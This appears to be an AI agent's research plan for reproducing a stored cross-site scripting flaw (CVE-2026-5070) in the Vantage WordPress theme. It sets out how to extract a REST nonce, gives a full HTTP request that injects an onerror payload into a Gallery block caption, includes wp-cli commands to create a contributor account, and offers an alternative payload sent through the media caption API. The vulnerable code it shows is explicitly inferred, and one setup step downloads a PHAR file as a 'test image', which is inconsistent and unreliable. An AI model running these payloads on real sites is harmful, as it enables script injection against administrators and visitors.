Research Plan: CVE-2026-5070 - Vantage Theme Stored XSS

1. Vulnerability Summary

The Vantage theme for WordPress (up to and including version 1.20.32) contains a Stored Cross-Site Scripting (XSS) vulnerability. The flaw exists in the theme's custom rendering logic for the WordPress Gallery block. Specifically, the theme fails to properly sanitize or escape user-supplied text content (likely image captions or block descriptions) before echoing it into the HTML output on the frontend. This allows an authenticated user with Contributor-level permissions or higher to inject malicious scripts into posts, which execute in the context of any user (including administrators) viewing the affected page.

2. Attack Vector Analysis

• Endpoint: WordPress REST API POST /wp-json/wp/v2/posts or the classic POST /wp-admin/post.php.
• Vulnerable Parameter: post_content (specifically within the Gutenberg block comment delimiters for wp:gallery).
• Authentication Level: Contributor+ (any role allowed to create and edit posts).
• Preconditions: The Vantage theme must be active. At least one image must be present in the Media Library to be included in a Gallery block (or a valid attachment ID must be referenced).

3. Code Flow

1. Input: A Contributor user saves a post containing a Gallery block. The block's attributes (stored in HTML comments) include an image with a malicious caption: <!-- wp:gallery ... --> ... <figcaption>PAYLOAD</figcaption> ... <!-- /wp:gallery -->.
2. Storage: WordPress saves the raw block content to the wp_posts table.
3. Processing: When a user views the post, WordPress parses the blocks. The Vantage theme likely registers a filter on render_block for core/gallery or uses a template override for galleries.
4. The Sink: In the Vantage theme's gallery rendering function (likely located in inc/gallery.php or a similar template part), the code iterates through the gallery items.
5. Execution: The code retrieves the caption or description for each image and echoes it directly:

   // Inferred Vulnerable Pattern in Vantage
   $caption = $item['caption']; 
   echo '<div class="vantage-gallery-caption">' . $caption . '</div>'; // Missing esc_html()
   

4. Nonce Acquisition Strategy

While the REST API requires a _wpnonce for state-changing requests, we can use the browser_eval tool to obtain the REST nonce from the WordPress admin dashboard.

1. Navigate to Admin: Use browser_navigate to go to /wp-admin/.
2. Extract Nonce: Execute browser_eval("wpApiSettings.nonce").
3. Alternative (Classic Editor): If using post.php, navigate to /wp-admin/post-new.php and extract the _wpnonce from the form using browser_eval("document.querySelector('#_wpnonce').value").

5. Exploitation Strategy

1. Authentication: Log in as a Contributor user.
2. Image Prep: Identify a valid Attachment ID. If none exist, upload a small image using the REST API or wp_cli.
3. Payload Injection:
   • Construct a Gallery block payload where the figcaption or the caption attribute contains an XSS payload: <img src=x onerror=alert(document.domain)>.
   • Send a POST request to /wp-json/wp/v2/posts to create a new post with this content.
4. Triggering: Navigate to the URL of the newly created post as any user.

Sample HTTP Request (REST API):

POST /wp-json/wp/v2/posts HTTP/1.1
Content-Type: application/json
X-WP-Nonce: [EXTRACTED_NONCE]

{
  "title": "Gallery Test",
  "status": "publish",
  "content": "<!-- wp:gallery {\"ids\":[ATTACHMENT_ID]} -->\n<figure class=\"wp-block-gallery has-thumbnails\">\n<ul class=\"blocks-gallery-grid\">\n<li class=\"blocks-gallery-item\">\n<figure>\n<img src=\"/path/to/img.jpg\" data-id=\"ATTACHMENT_ID\" />\n<figcaption><img src=x onerror=alert('XSS_SUCCESS')></figcaption>\n</figure>\n</li>\n</ul>\n</figure>\n<!-- /wp:gallery -->"
}

6. Test Data Setup

1. Theme Installation: Ensure Vantage <= 1.20.32 is installed and active.
2. User Creation:
   wp user create attacker attacker@example.com --role=contributor --user_pass=password123
3. Media Setup:
   • Download a test image: wget https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar (or any dummy file).
   • Upload to media library: wp media import /path/to/test.jpg --user=1
   • Note the returned Attachment ID.

7. Expected Results

• The POST request to create the post should return a 201 Created status.
• Upon navigating to the post URL (e.g., /?p=123), the browser should execute the alert('XSS_SUCCESS') payload.
• Checking the page source should reveal the raw <img src=x onerror=...> tag within the gallery container, confirming no escaping occurred.

8. Verification Steps

1. Verify Content Storage:
   wp post get [POST_ID] --field=post_content
   Confirm the payload is exactly as sent.
2. Verify Frontend Execution:
   Use browser_navigate to the post permalink and check if the alert or a specific DOM element injected by the payload is present.

9. Alternative Approaches

• Caption Metadata: If the figcaption in post_content is not the sink, try updating the actual Attachment metadata (caption field) via the REST API:
  POST /wp-json/wp/v2/media/[ATTACHMENT_ID] with {"caption": "<img src=x onerror=alert(1)>"}.
  Vantage may be pulling the caption directly from the attachment object during gallery rendering instead of the block HTML.
• SiteOrigin Integration: If Vantage uses the SiteOrigin Gallery Widget/Block, the payload should be placed in the widget's JSON data structure within the post_content.